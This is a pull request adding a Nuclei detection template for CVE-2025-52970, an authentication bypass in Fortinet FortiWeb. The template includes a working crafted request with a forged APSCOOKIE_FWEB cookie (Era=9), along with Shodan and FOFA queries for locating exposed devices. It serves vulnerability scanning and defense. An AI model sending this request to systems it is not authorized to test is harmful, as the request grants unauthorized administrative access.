### PR TITLE
Add template for CVE-2025-52970 detection

### DIFF
--- a/http/cves/2025/CVE-2025-52970.yaml
+++ b/http/cves/2025/CVE-2025-52970.yaml
@@ -1,0 +1,69 @@
+id: CVE-2025-52970
+
+info:
+  name: Fortinet FortiWeb - Broken Access Control
+  author: abcds07
+  severity: high
+  description: |
+    Fortinet FortiWeb contain a broken access control caused by improper handling of parameters, letting unauthenticated remote attackers with non-public device info gain admin privileges via crafted requests. The vulnerability involves cookie manipulation that bypasses authentication mechanisms.
+  reference:
+    - https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970
+    - https://nvd.nist.gov/vuln/detail/CVE-2025-52970
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2025-52970
+    cwe-id: CWE-284
+    epss-score: 0.41912
+    epss-percentile: 0.97342
+    cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: fortinet
+    product: fortiweb
+    shodan-query:
+      - ssl:"cn=fortiweb"
+      - title:"FortiWeb - "
+    fofa-query:
+      - ssl:"cn=fortiweb"
+      - title="FortiWeb - "
+    google-query: intitle:"FortiWeb - "
+  tags: cve,cve2025,fortinet,fortiweb,access-control,privilege-escalation,kev
+
+variables:
+  marker: "{{rand_text_alpha(8)}}"
+
+http:
+  - raw:
+      - |
+        GET /api/v2.0/system/status.systemstatus HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
+        Accept: */*
+        Accept-Language: en
+        Cookie: APSCOOKIE_FWEB_{{rand_int(1000000000000000000, 9999999999999999999)}}=Era=9&Payload={{marker}}&AuthHash={{marker}}
+
+    matchers:
+      - type: regex
+        name: auth_bypass
+        part: body
+        regex:
+          - '"administrativeDomain":"Enabled"'
+          - '"firmwareVersion":"FortiWeb-VM [0-7]\\.[0-6]\\.[0-3]"'
+        condition: and
+
+    extractors:
+      - type: regex
+        name: firmware_version
+        part: body
+        group: 1
+        regex:
+          - '"firmwareVersion":"([^"]+)"'
+
+      - type: regex
+        name: administrative_domain
+        part: body
+        group: 1
+        regex:
+          - '"administrativeDomain":"([^"]+)"'


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2025-52970 - Fortinet FortiWeb Broken Access Control template
- References: https://pwner.gg/blog/2025-08-13-fortiweb-cve-2025-52970

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

#### Additional Details

Template implements cookie manipulation authentication bypass using Era=9 parameter. Uses correct APSCOOKIE_FWEB format and matches specific FortiWeb response fields. Addresses feedback from rejected PRs by using proper endpoint and realistic matchers.

/claim https://github.com/projectdiscovery/nuclei-templates/issues/12947

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)